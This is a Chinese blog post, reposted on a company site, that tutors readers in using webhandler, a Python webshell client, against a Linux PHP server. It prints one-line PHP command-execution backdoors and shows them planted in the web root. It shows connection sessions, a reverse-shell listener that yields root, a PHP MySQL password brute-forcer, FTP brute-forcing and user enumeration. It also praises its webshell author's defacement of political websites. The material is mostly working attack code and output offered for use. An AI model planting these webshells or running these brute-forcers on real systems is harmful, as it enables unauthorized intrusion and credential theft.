企业资讯
- 企业新闻
- 行业文章

Linux下的”菜刀”–webhandler

教学文档的342课，说起菜刀，就不得不提起菜刀的作者，作者是一个退伍军人，生长在一个贫穷的农村，据说初中也没读完，英语更是不咋地，但他却自学掌握了

C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand/Helen_Sb/HOW/TO/MAKE/LOVE

等等，当初在六七年前台湾闹独立的时候，他在国民党和民进党的网站上留下了“只有一个中国”的黑页，一举成名。

作者是一个朴实，低调的技术牛人，他这些年留下的作品很多，中国菜刀是他最新的一个作品，从他之前的作品WEBSHELL管理器的基础上修改而来，功能更加的强大。

你见过很强大的ASP后门，很强大的PHP后门，很强大的ASPX后门，那你见过很强大的asp,aspx,php三合一后门么……..，没有吧，尤其是这个后门，只有一句话。

是不是很震憾，很不可思议，是的，我刚接触的时候，也是这样的想法，就这三句话，一个名不见经传的“中国菜刀”，就可以代替我那搜集了几年，大大小小几百个多种平台多种环境的脚本后门？，事实证明，我错了，原来“中国菜刀”不仅仅可以代替那些后门，而且他的功能超出我的想象，没试过菜刀 FOR WINE，不知道能否在LINUX下运行，不过有个类似的工具 webhandler , 脚本：PYTHON

介绍

他指出POST 和 GET的提交方式，只支持PHP脚本运行客服端：

 &lt;?php system($_GET['cmd']); ?&gt; &lt;?php passthru($_REQUEST['cmd']); ?&gt; &lt;?php echo exec($_POST['cmd']); ?&gt;

<?php system($_GET[‘cmd’]); ?>

<?php passthru($_REQUEST[‘cmd’]); ?>

<?php echo exec($_POST[‘cmd’]); ?>

使用

安装

 root@Dis9Team:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.zip root@Dis9Team:/pen/door# unzip webhandler.zip  root@Dis9Team:/pen/door# cd webhandler root@Dis9Team:/pen/door/webhandler# apt-get install python-setuptools  root@Dis9Team:/pen/door/webhandler# easy_install argparse

root@Dis9Team:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.zip

root@Dis9Team:/pen/door# unzip webhandler.zip

root@Dis9Team:/pen/door# cd webhandler

root@Dis9Team:/pen/door/webhandler# apt-get install python-setuptools

root@Dis9Team:/pen/door/webhandler# easy_install argparse

客服端使用

GET提交

 root@ubuntu:/var/www# echo ‘&lt;?php system($_GET['cmd']); ?&gt;’ &gt; /var/www/get.php

1	root@ubuntu:/var/www# echo ‘<?php system($_GET['cmd']); ?>’ > /var/www/get.php

链接

 root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –url http://5.5.5.3/get.php?cmd=

1	root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –url http://5.5.5.3/get.php?cmd=

________ __ _______ __ __

| | | |.—–.| |–.| | |.—.-.—–.–| | |.—–.—-.

| | | || -__|| _ || || _ | | _ | || -__| _|

|________||_____||_____||___|___||___._|__|__|_____|__||_____|__|

————————————————————————-

[!] “non-git”. Keep up-to-date by running ‘–update’

———————————————————–

User : www-data

ID : uid=33(www-data) gid=33(www-data) groups=33(www-data)

Kernel : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux

CWD : /var/www drwxrwxrwx

Uptime : 4 minutes

Target’s IPs : 5.5.5.3

Our IP : 174.139.7.227

———————————————

[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit

[+] Inserting ! at the begining of the command will execute the command locally (on your box)

 www-data@5.5.5.3:~(/var/www):$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@5.5.5.3:~(/var/www):$

www-data@5.5.5.3:~(/var/www):$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@5.5.5.3:~(/var/www):$

POST提交

 root@ubuntu:/var/www# echo ‘&lt;?php echo exec($_POST['cmd']); ?&gt;’ &gt; post.php

1	root@ubuntu:/var/www# echo ‘<?php echo exec($_POST['cmd']); ?>’ > post.php

连接

 root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –url http://5.5.5.3/post.php –method POST –parameter cmd

1	root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –url http://5.5.5.3/post.php –method POST –parameter cmd

__ __ _ _ _ _ _

/ / | | | | | | | | |

/ / /__| |__ | |__| | __ _ _ __ __| | | ___ _ __

/ / / _ ‘_ | __ |/ _ | '_ / _ | |/ _ ‘__|

/ / __/ |_) | | | | (_| | | | | (_| | | __/ |

/ / ___|_.__/|_| |_|__,_|_| |_|__,_|_|___|_|

———————————————————–

[!] “non-git”. Keep up-to-date by running ‘–update’

———————–

User : 5.5.5.3

ID : Unknown

Kernel : Unknown

CWD : Unknown Unknown

Uptime : Unknown

Target’s IPs : Unknow

Our IP : 174.139.7.227

———————–

[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit

[+] Inserting ! at the begining of the command will execute the command locally (on your box)

 5.5.5.3@Unknow:~(Unknown):$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) 5.5.5.3@Unknow:~(Unknown):$

5.5.5.3@Unknow:~(Unknown):$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

5.5.5.3@Unknow:~(Unknown):$

监听功能

先监听端口

 root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –listen 1234

1	root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –listen 1234

[!] “non-git”. Keep up-to-date by running ‘–update’

[i] Waiting on port: 1234

运行PHP REVER SHELL 获得SHELL

获得系统信息

# root@5.5.5.3:~(/var/www):$ @info

———————————————————-

User : root

ID : uid=0(root) gid=0(root) groups=0(root)

Kernel : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux

CWD : /var/www drwxrwxrwx

Uptime : 11 minutes

Target’s IPs : 5.5.5.3

Our IP : 174.139.7.227

——————————————————–

[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit

[+] Inserting ! at the begining of the command will execute the command locally (on your box)

 root@5.5.5.3:~(/var/www):$

1	root@5.5.5.3:~(/var/www):$

暴力破解MYSQL

默认字典： modules/bruters/wordlist.txt，他会自动上传

这个东西有点占用进程.而且还是单线程小心使用

核心代码

 #!/usr/bin/env php &lt;?php error_reporting(0); $host = “127.0.0.1″; $user_dict = “wordlist.txt”; $pass_dict = “wordlist.txt”; $userFile = file($user_dict); $passFile = file($pass_dict); $success; foreach ($userFile as $user) {     if ($success == 1) {         break;     }     foreach ($passFile as $pass) {         $user = trim($user);         $pass = trim($pass);         $connection = mysql_connect($host, $user, $pass);         if ($connection) {             echo “success:” . $user . “:” . $pass . “n”;             $success = 1;             mysql_close($connection);             break;         }     } } ?&gt; #!/usr/bin/env php &lt;?php error_reporting(0); $host = “127.0.0.1″; $user_dict = “wordlist.txt”; $pass_dict = “wordlist.txt”; $userFile = file($user_dict); $passFile = file($pass_dict); $success; foreach ($userFile as $user) {     if ($success == 1) {         break;     }     foreach ($passFile as $pass) {         $user = trim($user);         $pass = trim($pass);         $connection = mysql_connect($host, $user, $pass);         if ($connection) {             echo “success:” . $user . “:” . $pass . “n”;             $success = 1;             mysql_close($connection);             break;         }     } } ?&gt;

#!/usr/bin/env php

<?php

error_reporting(0);

$host = “127.0.0.1″;

$user_dict = “wordlist.txt”;

$pass_dict = “wordlist.txt”;

$userFile = file($user_dict);

$passFile = file($pass_dict);

$success;

foreach ($userFile as $user) {

if ($success == 1) {

break;

}

foreach ($passFile as $pass) {

$user = trim($user);

$pass = trim($pass);

$connection = mysql_connect($host, $user, $pass);

if ($connection) {

echo “success:” . $user . “:” . $pass . “n”;

$success = 1;

mysql_close($connection);

break;

}

#!/usr/bin/env php

<?php

error_reporting(0);

$host = “127.0.0.1″;

$user_dict = “wordlist.txt”;

$pass_dict = “wordlist.txt”;

$userFile = file($user_dict);

$passFile = file($pass_dict);

$success;

foreach ($userFile as $user) {

if ($success == 1) {

break;

}

foreach ($passFile as $pass) {

$user = trim($user);

$pass = trim($pass);

$connection = mysql_connect($host, $user, $pass);

if ($connection) {

echo “success:” . $user . “:” . $pass . “n”;

$success = 1;

mysql_close($connection);

break;

}

暴力FTP

一样

 5.5.5.3@Unknow:~(Unknown):$ @brute  ftp

1	5.5.5.3@Unknow:~(Unknown):$ @brute ftp

查看用户组

5.5.5.3@Unknow:~(Unknown):$ @enum group

[+] Total number of groups: 1

——————————————————-

Group Name | Password | Group ID | Group List |

——————————————————-

honeyd | *In shadow* | 115 | |

——————————————————-

5.5.5.3@Unknow:~(Unknown):$ @enum passwd

[+] Total number of users: 1

———————————-

—————————————————————-

b | *In shadow* | 1004 | 33 | | /dev/null | /usr/sbin/nologin

————————————————————–

5.5.5.3@Unknow:~(Unknown):$

貌似是个蜜罐哈哈哈

link：http://fuzzexp.org/linux_php_webshell_.html

本文作者Dis9 team转自红黑由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理，转载请注明出处！

鸿大千秋网站建设团队敬上